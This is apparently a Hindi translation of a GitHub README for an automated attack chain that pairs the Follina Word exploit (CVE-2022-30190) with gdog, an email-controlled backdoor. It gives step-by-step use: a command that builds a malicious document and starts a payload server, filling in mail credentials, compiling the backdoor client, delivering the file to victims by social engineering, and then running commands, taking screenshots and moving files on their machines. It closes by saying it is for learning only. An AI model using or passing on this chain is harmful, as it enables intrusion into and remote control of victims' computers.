AmzWord
CVE-2022-30190, 163 ईमेल बैकडोर और इमेज स्टेग्नोग्राफ़ी पर आधारित एक स्वचालित अटैक चेन
निम्नलिखित github रिपॉजिटरी के लिए धन्यवाद, हमने अपने कार्य को एकीकृत और कार्यान्वित करने के लिए कोड के कुछ हिस्से को संदर्भित और संशोधित किया है:
中文README请看这里
आवश्यकताएँ
gdog:
- Python 2.7
- PyCrypto मॉड्यूल
- WMI मॉड्यूल
- Enum34 मॉड्यूल
- Netifaces मॉड्यूल
follina:
उपयोग और अटैक प्रक्रिया
-
एक दुर्भावनापूर्ण word फ़ाइल बनाने और http लिसनिंग चालू करने के लिए follina.py का उपयोग करें
- आप कोड में डिफ़ॉल्ट नाम और डिफ़ॉल्ट ip बदल सकते हैं
- आप
--ip और --output का भी उपयोग कर सकते हैं
- विस्तृत उपयोग के लिए कृपया follina देखें। हमने उपयोग इंटरफ़ेस नहीं बदला है।
- उदा:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
gdog के अंतर्गत client.py और gdog.py को संशोधित करें और निम्नलिखित जानकारी भरें
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
client.py को संकलित करके tar.exe बनाएं और इसे /follina/www के अंतर्गत रखें
-
इसे लक्ष्य तक पहुँचाने के लिए किसी भी सोशल इंजीनियरिंग विधि का उपयोग करें। जैसे ही पीड़ित word खोलता है, tar.exe स्वचालित रूप से डाउनलोड और निष्पादित हो जाएगा।
-
हमलावर स्थानीय रूप से gdog चलाता है और लक्ष्य मशीन को नियंत्रित करने के लिए कमांड भेजता है। उपयोग के लिए, gdog देखें
टिप्पणी
- यह केवल अटैक चेन कार्यान्वयन का एक डेमो है। चल रहा exe टास्क मैनेजर में भी पाया जा सकता है, जिससे प्रभाव का निरीक्षण करना आसान हो जाता है। हमने एंटी-वायरस, छिपाने और विशेषाधिकार वृद्धि जैसे कोई ऑपरेशन नहीं किए। बेशक, विंडोज़ पर ये मुश्किल भी नहीं हैं, है ना?
- gdog प्रोजेक्ट काफी समय से मौजूद है, और हमने इसे सफलतापूर्वक चलाने के लिए बहुत प्रयास किए हैं। वर्तमान में पुष्टि किए गए रिमोट कंट्रोल कमांड में शामिल हैं: कमांड निष्पादित करना, स्क्रीनशॉट लेना, पॉप-अप विंडो, शट डाउन, स्क्रीन लॉक करना और फ़ाइल स्थानांतरित करना। ये फ़ंक्शन अधिकांश आवश्यकताओं के लिए पर्याप्त हैं।
- मुझे नहीं पता क्यों, लेकिन imap की SUBJECT खोज में कुछ समस्या लगती है। हम लक्षित विषय वाले ईमेल खोज नहीं सकते हैं, और वापसी मान खाली है। हम केवल अन्य तरीके अपना सकते हैं, जैसे सभी अपठित ईमेल पढ़ना, लक्ष्यों को फ़िल्टर करना, और फिर दूसरों को अपठित के रूप में सेट करना। जब कई नियंत्रित उपयोगकर्ता हों तो यह समस्या पैदा कर सकता है और इसे हल करने की आवश्यकता है।
- यह प्रोजेक्ट केवल सीखने और आदान-प्रदान के उद्देश्यों के लिए है।